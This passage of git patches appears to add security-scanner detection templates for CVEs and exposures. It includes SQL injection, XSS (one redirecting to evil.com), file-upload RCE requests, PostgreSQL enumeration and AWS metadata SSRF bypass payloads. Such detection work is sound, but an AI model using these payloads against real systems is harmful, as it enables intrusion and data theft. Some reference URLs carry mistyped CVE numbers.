'{{BaseURL}}/restgui/start.html' + - '{{BaseURL}}/login.html' + + stop-at-first-match: true + + matchers: + - type: word + part: body + words: + - ' Date: Thu, 22 Jun 2023 20:54:00 +0530 Subject: [PATCH 169/609] Create collibra-properties.yaml --- .../configs/collibra-properties.yaml | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/exposures/configs/collibra-properties.yaml diff --git a/http/exposures/configs/collibra-properties.yaml b/http/exposures/configs/collibra-properties.yaml new file mode 100644 index 0000000000..e82842f603 --- /dev/null +++ b/http/exposures/configs/collibra-properties.yaml @@ -0,0 +1,49 @@ +id: collibra-properties + +info: + name: Collibra Properties Exposure + author: 0xPugazh + severity: high + reference: + - https://twitter.com/shaybt12/status/1662431219223605254 + metadata: + verified: true + max-request: 3 + tags: exposure,config,properties + + +http: + - method: GET + path: + - "{{BaseURL}}/collibra.properties" + - "{{BaseURL}}/app/collibra.properties" + - "{{BaseURL}}/src/collibra.properties" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'collibra.url' + - 'collibra.port' + - 'collibra.user' + - 'collibra.password' + condition: or + + - type: word + part: header + words: + - "text/plain" + - "bytes" + condition: or + + - type: word + part: header + words: + - "text/html" + negative: true + + - type: status + status: + - 200 From 9d178aa9186c9d01cd89d0425c9220c683522711 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Jun 2023 21:00:04 +0530 Subject: [PATCH 170/609] trail space fix --- http/exposures/configs/collibra-properties.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/exposures/configs/collibra-properties.yaml b/http/exposures/configs/collibra-properties.yaml index e82842f603..1ba06f2f6e 100644 --- a/http/exposures/configs/collibra-properties.yaml +++ b/http/exposures/configs/collibra-properties.yaml @@ -22,22 +22,22 @@ http: stop-at-first-match: true matchers-condition: and matchers: - - type: regex + - type: word part: body - regex: + words: - 'collibra.url' - 'collibra.port' - 'collibra.user' - 'collibra.password' condition: or - + - type: word part: header words: - "text/plain" - "bytes" condition: or - + - type: word part: header words: From 4cdc08f25bd727b4f9b4acb3f5eafc70eee90781 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Jun 2023 23:12:57 +0530 Subject: [PATCH 171/609] Create CVE-2023-34659.yaml --- http/cves/2023/CVE-2023-34659.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2023/CVE-2023-34659.yaml diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml new file mode 100644 index 0000000000..ee52efe52d --- /dev/null +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-34659 + +info: + name: Jeecg-boot 3.5.0 - SQL Injection + author: ritikchaddha + severity: critical + description: | + jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface. + reference: + - https://github.com/jeecgboot/jeecg-boot/issues/4976 + - https://nvd.nist.gov/vuln/detail/CVE-2023-34659 + classification: + cve-id: CVE-2023-34659 + metadata: + shodan-query: http.favicon.hash:1380908726 + tags: cve,cve2023,jeecg,sqli + +http: + - raw: + - | + POST /jeecg-boot/jmreport/show HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"id":"961455b47c0b86dc961e90b5893bff05","apiUrl":"","params":"{"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '"}"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "XPATH syntax error:" + - "SQLException" + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 From 2a669a1401f3ca71001d188d60ae2e3fa9adf3f0 Mon Sep 17 00:00:00 2001 From: mastercho Date: Sat, 24 Jun 2023 01:25:37 +0300 Subject: [PATCH 172/609] Updated php-backup extenstions --- http/exposures/backups/php-backup-files.yaml | 122 +++++++++++++++++++ 1 file changed, 122 insertions(+) create mode 100644 http/exposures/backups/php-backup-files.yaml diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml new file mode 100644 index 0000000000..c9c7a321d6 --- /dev/null +++ b/http/exposures/backups/php-backup-files.yaml @@ -0,0 +1,122 @@ +id: php-backup-files + +info: + name: PHP Source - Backup File Information Disclosure + author: StreetOfHackerR007,pwnhxl,mastercho + severity: medium + tags: exposure,backup,php,disclosure,fuzz + metadata: + max-request: 1025 + +http: + - method: GET + path: + - "{{BaseURL}}{{filepath}}{{bakext}}" + + attack: clusterbomb + payloads: + filepath: + - /wp-config.php # wordpress + - /wp-config # wordpress + - /site/default/settings.php # drupal + - /installation/configuration.php # joomla + - /app/etc/env.php # magento + - /Application/Common/Conf/config.php # thinkphp + - /environments/dev/common/config/main-local.php # yii + - /environments/prod/common/config/main-local.php # yii + - /common/config/main-local.php # yii + - /system/config/default.php # opencart + - /typo3conf/localconf.php # typo3 + - /config/config_global.php # discuz + - /config/config_ucenter.php # discuz + - /textpattern/config.php # textpattern + - /data/common.inc.php # dedecms + - /caches/configs/database.php # phpcms + - /caches/configs/system.php # phpcms + - /include/config.inc.php # phpcms + - /include/config.php # xbtit + - /includes/config.php # vbulletin + - /includes/config # vbulletin + - /phpsso_server/caches/configs/database.php # phpcms + - /phpsso_server/caches/configs/system.php # phpcms + - /zb_users/c_option.php # zblog + - /e/class/config.php # empirecms + - /e/config/config.php # empirecms + - /data/sql_config.php # phpwind + - /data/bbscache/config.php # phpwind + - /db.php + - /conn.php + - /database.php + - /db_config.php + - /config.inc.php + - /data/config.php + - /config/config.php + - /index.php + - /default.php + - /main.php + - /settings.php + - /header.php + - /footer.php + - /login.php + - /404.php + - /wp-login.php + - /config.php + + bakext: + - ".~" + - ".bk" + - ".bak" + - ".bkp" + - ".BAK" + - ".swp" + - ".swo" + - ".swn" + - ".tmp" + - ".save" + - ".old" + - ".new" + - ".orig" + - ".dist" + - ".txt" + - ".disabled" + - ".original" + - ".backup" + - "_bak" + - "_1.bak" + - "~" + - "!" + - ".0" + - ".1" + - ".2" + - ".3" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + - "($" + - "$_GET[" + - "$_POST[" + - "$_REQUEST[" + - "$_SERVER[" + condition: or + + - type: word + part: header + words: + - "text/plain" + - "bytes" + condition: or \ No newline at end of file From 1cca7c3bb370b967e7856478bfcc077e9d59778f Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Sat, 24 Jun 2023 19:46:18 +0530 Subject: [PATCH 173/609] Create CVE-2023-34537.yaml --- http/cves/2023/CVE-2023-34537.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2023/CVE-2023-34537.yaml diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml new file mode 100644 index 0000000000..9d8a38f841 --- /dev/null +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-34537 + +info: + name: Hoteldruid - Reflected XSS + - Cross Site Scripting + author: Harsh + severity: medium + description: | + A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data. + reference: + - https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5 + - https://nvd.nist.gov/vuln/detail/CVE-2023-34537 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-34537 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,hoteldrui,reflected,xss,unauth + +http: + - raw: + - | + POST /hoteldruid/creaprezzi.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + anno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1 + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "")' + - 'contains(body_1, "HotelDruid")' + condition: and From 81c8b51ea2ca214897a64aa264ece52a033743b6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 24 Jun 2023 20:05:55 +0530 Subject: [PATCH 174/609] misc update --- http/cves/2023/CVE-2023-34537.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 9d8a38f841..ecc7d7bfdf 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -1,8 +1,7 @@ id: CVE-2023-34537 info: - name: Hoteldruid - Reflected XSS - - Cross Site Scripting + name: Hoteldruid - Reflected Cross Site Scripting author: Harsh severity: medium description: | @@ -16,7 +15,7 @@ info: cve-id: CVE-2023-34537 cwe-id: CWE-79 metadata: - verified: "true" + verified: true tags: cve,cve2023,hoteldrui,reflected,xss,unauth http: @@ -25,15 +24,14 @@ http: POST /hoteldruid/creaprezzi.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + anno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1 - cookie-reuse: true redirects: true matchers: - type: dsl dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "")' - - 'contains(body_1, "HotelDruid")' + - 'status_code == 200' + - 'contains(body, "")' + - 'contains(body, "HotelDruid")' condition: and From 4a09a65e58b6d392a7248fbd4a5c1c455ad425a8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 24 Jun 2023 23:44:43 +0530 Subject: [PATCH 175/609] Update CVE-2023-34537.yaml --- http/cves/2023/CVE-2023-34537.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index ecc7d7bfdf..b8b5d03a4f 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -1,7 +1,7 @@ id: CVE-2023-34537 info: - name: Hoteldruid - Reflected Cross Site Scripting + name: Hoteldruid - Cross Site Scripting author: Harsh severity: medium description: | @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2023,hoteldrui,reflected,xss,unauth + tags: cve,cve2023,hoteldrui,xss,authenticated http: - raw: From c8861f63bdafdc93a6fb6b13d283b422fe465bb3 Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Sun, 25 Jun 2023 17:13:30 +0530 Subject: [PATCH 176/609] Create CVE-2016-10973.yaml --- http/cves/2016/CVE-2016-10973.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2016/CVE-2016-10973.yaml diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml new file mode 100644 index 0000000000..c705e21274 --- /dev/null +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -0,0 +1,41 @@ +id: CVE-2016-10973 + +info: + name: brafton WordPress Plugin <=3.4.7 - Reflected XSS + author: Harsh + severity: medium + description: | + The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. + reference: + - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd + - https://nvd.nist.gov/vuln/detail/CVE-2026-10973 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-10973 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2016,xss,brafton,reflected,auth + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83)) HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))")' + - 'contains(body_2, "Brafton Article Loader")' + condition: and From c7bd0427df00410261895a092f704991ec27d298 Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Sun, 25 Jun 2023 22:28:59 +0530 Subject: [PATCH 177/609] Create CVE-2023-33440.yaml --- http/cves/2023/CVE-2023-33440.yaml | 77 ++++++++++++++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 http/cves/2023/CVE-2023-33440.yaml diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml new file mode 100644 index 0000000000..35cf4ec524 --- /dev/null +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -0,0 +1,77 @@ +id: CVE-2023-33440 + +info: + name: Remote Code Execution - Faculty Evaluation System + author: Harsh + severity: high + description: | + Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user. + reference: + - http://packetstormsecurity.com/files/172672/Faculty-Evaluation-System-1.0-Shell-Upload.html + - https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/RCE-1.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-333440 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2023-33440 + cwe-id: CWE-434 + metadata: + verified: true + tags: cve,cve2023,afu,rce,unauthenticated +http: + - raw: + - | + POST /eval/ajax.php?action=save_user HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryV57DTxSo887Tnp4O + + ------WebKitFormBoundaryV57DTxSo887Tnp4O + Content-Disposition: form-data; name="id" + + + ------WebKitFormBoundaryV57DTxSo887Tnp4O + Content-Disposition: form-data; name="firstname" + + test + ------WebKitFormBoundaryV57DTxSo887Tnp4O + Content-Disposition: form-data; name="lastname" + + test2 + ------WebKitFormBoundaryV57DTxSo887Tnp4O + Content-Disposition: form-data; name="img"; filename="hack.php" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryV57DTxSo887Tnp4O + Content-Disposition: form-data; name="email" + + abc@123.com + ------WebKitFormBoundaryV57DTxSo887Tnp4O + Content-Disposition: form-data; name="password" + + 123456 + ------WebKitFormBoundaryV57DTxSo887Tnp4O + Content-Disposition: form-data; name="cpass" + + 123456 + ------WebKitFormBoundaryV57DTxSo887Tnp4O-- + + - | + GET /eval/assets/uploads/ HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "hack.php")' + - 'contains(body_2, "Index of /eval/assets/uploads")' + condition: and From a59080c824502d6d760578e756130532592137ab Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Mon, 26 Jun 2023 18:15:23 +0530 Subject: [PATCH 178/609] Create CVE-2023-33439.yaml --- http/cves/2023/CVE-2023-33439.yaml | 35 ++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/cves/2023/CVE-2023-33439.yaml diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml new file mode 100644 index 0000000000..eb3b71accc --- /dev/null +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-33439 + +info: + name: SQL Injection - Faculty Evaluation System + author: Harsh + severity: high + description: | + Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id= + reference: + - https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/SQLi-1.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-33439 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2023-33439 + cwe-id: CWE-89 + metadata: + verified: true + tags: cve,cve2023,sql,unauthenticated +http: + - raw: + - | + GET /eval/admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1 + Host:{{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Fatal error")' + - 'contains(body, "Uncaught Error: Call to a member function fetch_array()")' + condition: and From cc6d721634daf501e33b97432a62496140012a2d Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Mon, 26 Jun 2023 21:36:27 +0530 Subject: [PATCH 179/609] Create CVE-2023-0527.yaml --- http/cves/2023/CVE-2023-0527.yaml | 38 +++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cves/2023/CVE-2023-0527.yaml diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml new file mode 100644 index 0000000000..d6d6aaf278 --- /dev/null +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -0,0 +1,38 @@ +id: CVE-2023-0527 + +info: + name: Online Security Guards Hiring System - Reflected XSS + author: Harsh + severity: medium + description: | + A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input "> leads to cross site scripting. The attack may be launched remotely. + reference: + - https://vuldb.com/?ctiid.219596 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0527 + - https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-0527 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,osghs,xss,unauthenticated,reflected +http: + - raw: + - | + POST /osghs/search-request.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + searchdata=%3Cimg+src%3D%22%23%22+onerror%3D%22location.href%3D%27http%3A%2F%2Fevil.com%27%3B%22%3E&search= + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Online Security Gauard Hiring System |Search Request")' + - 'contains(body, "evil.com")' + condition: and From 5e95fc9c0f3f54f1579ef69b541affbdc59f2ad9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 26 Jun 2023 23:00:50 +0530 Subject: [PATCH 180/609] lint fix --- http/cves/2023/CVE-2023-0527.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index d6d6aaf278..4e76746784 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -5,7 +5,7 @@ info: author: Harsh severity: medium description: | - A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input "> leads to cross site scripting. The attack may be launched remotely. + A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input "> leads to cross site scripting. The attack may be launched remotely. reference: - https://vuldb.com/?ctiid.219596 - https://nvd.nist.gov/vuln/detail/CVE-2023-0527 From fb81d4d0a27b15080d7224c395f773c40346805b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 28 Jun 2023 10:14:14 +0530 Subject: [PATCH 181/609] Add files via upload --- network/misconfig/unauth-psql.yaml | 34 ++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 network/misconfig/unauth-psql.yaml diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml new file mode 100644 index 0000000000..607552366a --- /dev/null +++ b/network/misconfig/unauth-psql.yaml @@ -0,0 +1,34 @@ +id: unauth-psql + +info: + name: PostgreSQL - Unauthenticated Access + author: pussycat0x + severity: High + description: | + Unauthenticated PostgreSQL Detected. + reference: + - https://www.postgresql.org/docs/9.6/auth-methods.html + metadata: + verified: "true" + shodan-query: port:5432 product:"PostgreSQL" + tags: network,postgresql,db,unauth + +tcp: + - inputs: + - data: "00000054000300007573657200706f73746772657300646174616261736500706f737467726573006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000" #default database postgres + type: hex + read: 1024 + - data: "510000018e53454c45435420642e6461746e616d6520617320224e616d65222c0a2020202020202070675f636174616c6f672e70675f6765745f757365726279696428642e6461746462612920617320224f776e6572222c0a2020202020202070675f636174616c6f672e70675f656e636f64696e675f746f5f6368617228642e656e636f64696e67292061732022456e636f64696e67222c0a20202020202020642e646174636f6c6c6174652061732022436f6c6c617465222c0a20202020202020642e646174637479706520617320224374797065222c0a202020202020204e554c4c2061732022494355204c6f63616c65222c0a20202020202020276c6962632720415320224c6f63616c652050726f7669646572222c0a2020202020202070675f636174616c6f672e61727261795f746f5f737472696e6728642e64617461636c2c2045275c6e272920415320224163636573732070726976696c65676573220a46524f4d2070675f636174616c6f672e70675f646174616261736520640a4f5244455220425920313b00" + type: hex + read: 1024 + host: + - "{{Hostname}}" + + matchers: + - type: word + part: raw + words: + - "Access privileges" + - "Locale Provider" + - "Owner" + condition: and \ No newline at end of file From 7b8f01380dbe8913eecdf906586ed9d064e12cc8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 28 Jun 2023 10:32:46 +0530 Subject: [PATCH 182/609] Update unauth-psql.yaml --- network/misconfig/unauth-psql.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index 607552366a..9ff11fade8 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -23,6 +23,7 @@ tcp: read: 1024 host: - "{{Hostname}}" + - "{{Host}}:5432" matchers: - type: word @@ -31,4 +32,4 @@ tcp: - "Access privileges" - "Locale Provider" - "Owner" - condition: and \ No newline at end of file + condition: and From 66607766cc0d304f360c5fce76a202e0cc8f868e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jun 2023 10:54:50 +0530 Subject: [PATCH 183/609] comment space fix --- network/misconfig/unauth-psql.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index 9ff11fade8..fe5c767e76 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -15,7 +15,7 @@ info: tcp: - inputs: - - data: "00000054000300007573657200706f73746772657300646174616261736500706f737467726573006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000" #default database postgres + - data: "00000054000300007573657200706f73746772657300646174616261736500706f737467726573006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000" # default database postgres type: hex read: 1024 - data: "510000018e53454c45435420642e6461746e616d6520617320224e616d65222c0a2020202020202070675f636174616c6f672e70675f6765745f757365726279696428642e6461746462612920617320224f776e6572222c0a2020202020202070675f636174616c6f672e70675f656e636f64696e675f746f5f6368617228642e656e636f64696e67292061732022456e636f64696e67222c0a20202020202020642e646174636f6c6c6174652061732022436f6c6c617465222c0a20202020202020642e646174637479706520617320224374797065222c0a202020202020204e554c4c2061732022494355204c6f63616c65222c0a20202020202020276c6962632720415320224c6f63616c652050726f7669646572222c0a2020202020202070675f636174616c6f672e61727261795f746f5f737472696e6728642e64617461636c2c2045275c6e272920415320224163636573732070726976696c65676573220a46524f4d2070675f636174616c6f672e70675f646174616261736520640a4f5244455220425920313b00" From 371642ad1a12060c9e9676da1380edf8764c8485 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 28 Jun 2023 18:16:54 +0530 Subject: [PATCH 184/609] PostgreSQL - User Enumeration --- network/enumeration/psql-user-enum.yaml | 41 +++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 network/enumeration/psql-user-enum.yaml diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml new file mode 100644 index 0000000000..557dfb4d5a --- /dev/null +++ b/network/enumeration/psql-user-enum.yaml @@ -0,0 +1,41 @@ +id: psql-user-enum + +info: + name: PostgreSQL - User Enumeration + author: pussycat0x + severity: low + description: | + PSQL user enumeration. + reference: + - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 + metadata: + verified: "true" + shodan-query: port:5432 product:"PostgreSQL" + tags: network,postgresql,db,unauth,enum,psql + +tcp: + - inputs: + - data: "{{hex_encode('\u0000\u0000\u0000{{str}}\u0000\u0003\u0000\u0000user\u0000{{users}}\u0000database\u0000{{users}}\u0000application_name\u0000psql\u0000client_encoding\u0000UTF8\u0000\u0000')}}" + type: hex + + host: + - "{{Hostname}}" + - "{{Host}}:5432" + + attack: clusterbomb + payloads: + users: + - postgres + - tst + str: + - J + - T + - R + + matchers: + - type: word + part: raw + words: + - "client_encoding" + - "integer_datetimes" + condition: and \ No newline at end of file From 3464574bf06327b4c65e2eb4112a6d6b0d83f4b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jun 2023 12:39:39 +0530 Subject: [PATCH 185/609] Update metadata-aws.yaml --- http/misconfiguration/proxy/metadata-aws.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index 997490509c..0bc0b6d963 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -10,13 +10,15 @@ id: metadata-service-aws info: name: Amazon AWS Metadata Service Check - author: sullo + author: sullo,DhiyaneshDk severity: critical description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ + - https://twitter.com/Random_Robbie/status/1268186743657947137 + - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery# classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 @@ -36,6 +38,8 @@ http: hostval: - aws.oast.online - 169.254.169.254 + - 2852039166 # decimal encoding + - 169.254.169.254.nip.io unsafe: true matchers: - type: word @@ -44,5 +48,4 @@ http: - "public-ipv4" - "privateIp" condition: or - # Enhanced by mp on 2022/04/22 From 6d2b6f13c995e84f607ad74f48e2a49ddb1685d7 Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Thu, 29 Jun 2023 12:47:34 +0530 Subject: [PATCH 186/609] Create CVE-2023-33338.yaml --- http/cves/2023/CVE-2023-33338.yaml | 37 ++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/cves/2023/CVE-2023-33338.yaml diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml new file mode 100644 index 0000000000..0b014a518f --- /dev/null +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-33338 + +info: + name: Old Age Home Management System - SQL Injection + author: Harsh + severity: critical + description: | + Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter. + reference: + - 